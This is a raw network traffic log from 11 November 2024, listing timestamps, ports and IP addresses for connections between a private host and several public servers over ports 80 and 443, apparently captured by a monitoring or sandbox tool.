Nov 11, 2024 18:13:38.966773033 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:39.116643906 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:39.116677999 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:39.117018938 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:39.117225885 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:39.118912935 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:39.119417906 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.119446039 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.120032072 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.120096922 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.129086971 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.159342051 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:39.175326109 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.454408884 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.454543114 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.454722881 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.454782009 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.454826117 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.454879045 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.455216885 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.455279112 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.536526918 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.536621094 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.536850929 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.536915064 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.538465023 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.538474083 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.538503885 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.538538933 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.538552999 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.538580894 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.538599968 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.539211988 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.539269924 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.617819071 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.617902994 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.617924929 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.617995024 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.618720055 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.618765116 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.618789911 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.618799925 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.618819952 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.618840933 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.618844986 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.618870974 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:39.618896008 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.618922949 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:39.951014996 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:39.951085091 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:40.398247004 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398288012 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398313999 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398327112 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.398351908 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398369074 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.398401022 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.398406029 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398427963 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398483038 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.398487091 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398509026 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398530960 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.398535013 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.398560047 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.398587942 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.399056911 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.399110079 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.399137974 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.399298906 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.479583025 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479640961 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479666948 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479700089 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.479721069 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479743004 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.479762077 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.479823112 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479867935 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.479878902 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479917049 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.479921103 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479955912 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.479959011 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.479993105 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.480667114 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.480715990 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.480743885 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.480783939 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.480792999 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.480822086 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.480843067 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.481416941 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.481467962 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.481472969 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.481511116 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.481514931 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.481554985 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.481692076 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.481748104 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.482245922 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.482331038 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.482352972 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.482374907 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.482382059 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.482386112 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.482418060 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.482435942 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.560787916 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.560837030 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.560842037 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.560852051 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.560874939 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.560894966 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.560914993 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.560921907 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.560945988 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.560971022 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.560975075 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561017036 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.561021090 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561055899 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.561201096 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561235905 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.561239958 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561285973 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561326981 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.561331034 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561364889 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.561881065 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561907053 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561927080 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.561930895 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.561959982 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.561976910 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.562810898 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.562850952 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.562876940 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.562884092 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.562932968 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.563479900 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.563534975 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.563610077 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.563654900 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.563658953 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.563668966 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.563700914 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.564332962 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.564373016 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.564378023 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.564413071 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.564416885 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.564455032 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.844202995 CET	63482	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:40.844578981 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:40.844610929 CET	443	63490	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:40.844624996 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:40.845225096 CET	63485	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:40.845258951 CET	63490	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:40.845554113 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.845585108 CET	443	63493	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.845598936 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.846261024 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:40.846287012 CET	63493	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.846390009 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:40.846621037 CET	63517	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:40.847568035 CET	63518	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:40.847568035 CET	63519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:40.847872972 CET	63520	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:40.849189043 CET	80	63482	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:40.850279093 CET	80	63485	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:40.850881100 CET	63480	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:40.851634979 CET	80	63481	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:40.851646900 CET	80	63517	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:40.851680040 CET	63481	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:40.851778030 CET	63517	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:40.852317095 CET	80	63518	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:40.852374077 CET	63517	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:40.852375031 CET	63518	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:40.852415085 CET	80	63519	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:40.853130102 CET	80	63520	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:40.853208065 CET	63520	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:40.853300095 CET	63520	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:40.853605032 CET	63519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:40.854620934 CET	63519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:40.854620934 CET	63518	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:40.855858088 CET	80	63480	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:40.857189894 CET	80	63517	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:40.858156919 CET	80	63520	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:40.859652996 CET	80	63519	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:40.859663010 CET	80	63518	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:40.860729933 CET	63521	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:40.861691952 CET	63484	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:40.865674019 CET	80	63521	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:40.865748882 CET	63521	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:40.866861105 CET	80	63484	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:40.871223927 CET	63522	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:40.873872042 CET	63521	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:40.876149893 CET	80	63522	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:40.876223087 CET	63522	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:40.879292011 CET	80	63521	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:40.885122061 CET	63522	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:40.890157938 CET	80	63522	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:41.084383965 CET	63525	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.089231968 CET	80	63525	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:41.089328051 CET	63525	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.089545965 CET	63525	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.094309092 CET	80	63525	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:41.260210991 CET	80	63484	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:41.260278940 CET	63484	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:41.266645908 CET	80	63519	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:41.266761065 CET	63519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:41.278757095 CET	80	63518	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:41.278784990 CET	80	63518	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:41.278855085 CET	63518	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:41.305484056 CET	80	63522	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:41.305552006 CET	63522	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:41.307938099 CET	80	63517	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:41.308182001 CET	80	63517	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:41.308273077 CET	63517	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:41.312769890 CET	80	63521	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:41.312823057 CET	63521	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:41.313283920 CET	80	63522	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:41.313333035 CET	63522	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:41.590866089 CET	80	63525	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:41.590924025 CET	63525	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.590976000 CET	63525	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.595776081 CET	80	63525	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:41.614517927 CET	64177	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.619484901 CET	80	64177	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:41.619755983 CET	64177	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.619966984 CET	64177	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:41.626543999 CET	80	64177	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:41.723053932 CET	80	63520	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:41.723443985 CET	63520	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:42.148435116 CET	80	64177	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:42.148855925 CET	64177	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:42.200706005 CET	64177	80	192.168.2.6	72.52.179.174
Nov 11, 2024 18:13:42.207535982 CET	80	64177	72.52.179.174	192.168.2.6
Nov 11, 2024 18:13:43.967458010 CET	80	63492	64.190.63.136	192.168.2.6
Nov 11, 2024 18:13:43.967509031 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:13:44.068008900 CET	50515	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:44.074110031 CET	80	50515	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:44.074183941 CET	50515	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:44.078619003 CET	50515	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:44.083422899 CET	80	50515	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:44.389480114 CET	50517	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:44.389884949 CET	50518	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.396092892 CET	50519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:44.396545887 CET	80	50517	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:44.396564960 CET	80	50518	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.396624088 CET	50517	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:44.396642923 CET	50518	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.396770954 CET	50518	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.400893927 CET	80	50519	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:44.400948048 CET	50519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:44.401446104 CET	50519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:44.401731968 CET	80	50518	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.406435966 CET	80	50519	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:44.414901972 CET	50517	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:44.419768095 CET	80	50517	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:44.419924974 CET	50520	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.421631098 CET	50521	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:44.424822092 CET	80	50520	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.424894094 CET	50520	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.425369978 CET	50520	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.426676989 CET	80	50521	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:44.426721096 CET	50521	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:44.427001953 CET	50521	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:44.430192947 CET	80	50520	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.431807995 CET	80	50521	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:44.437196016 CET	50522	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:44.442636013 CET	80	50522	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:44.442740917 CET	50522	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:44.442828894 CET	50522	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:44.448426962 CET	80	50522	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:44.481888056 CET	50523	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:44.486777067 CET	80	50523	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:44.487957954 CET	50523	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:44.488079071 CET	50523	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:44.493527889 CET	50524	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:44.494029045 CET	80	50523	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:44.494684935 CET	50525	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:44.500153065 CET	80	50524	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:44.500582933 CET	80	50525	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:44.500593901 CET	80	50515	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:44.500608921 CET	50524	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:44.500627995 CET	50525	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:44.500643969 CET	50515	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:44.500790119 CET	50524	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:44.500842094 CET	50525	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:44.505614042 CET	80	50524	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:44.505623102 CET	80	50525	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:44.507350922 CET	80	50515	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:44.507400036 CET	50515	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:44.525460005 CET	64008	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:44.531274080 CET	80	64008	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:44.531351089 CET	64008	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:44.531507015 CET	64008	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:44.536364079 CET	80	64008	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:44.831434011 CET	80	50517	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:44.831510067 CET	50517	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:44.831515074 CET	80	50517	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:44.831527948 CET	80	50518	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.831578970 CET	50518	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.831581116 CET	50517	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:44.831974030 CET	80	50519	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:44.832037926 CET	50519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:44.834611893 CET	50519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:44.836793900 CET	80	50518	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.836839914 CET	50518	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.839467049 CET	80	50519	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:44.858380079 CET	80	50520	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.858489037 CET	50520	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.865504980 CET	80	50520	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:44.865557909 CET	50520	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:44.886501074 CET	80	50521	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:44.886781931 CET	50521	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:44.889035940 CET	80	50521	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:44.889278889 CET	50521	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:44.924052000 CET	80	50522	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:44.924237013 CET	50522	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:44.926908970 CET	80	50524	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:44.927022934 CET	50524	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:44.927155972 CET	50524	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:44.928672075 CET	80	50525	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:44.928733110 CET	50525	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:44.932478905 CET	80	50524	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:44.932641029 CET	50524	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:44.935471058 CET	80	50525	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:44.935569048 CET	50525	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:44.956275940 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:44.956321001 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:44.956378937 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:45.029043913 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:45.029077053 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:45.253226042 CET	80	64008	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:45.253289938 CET	64008	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:45.368333101 CET	80	50523	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:45.368432045 CET	50523	80	192.168.2.6	154.212.231.82
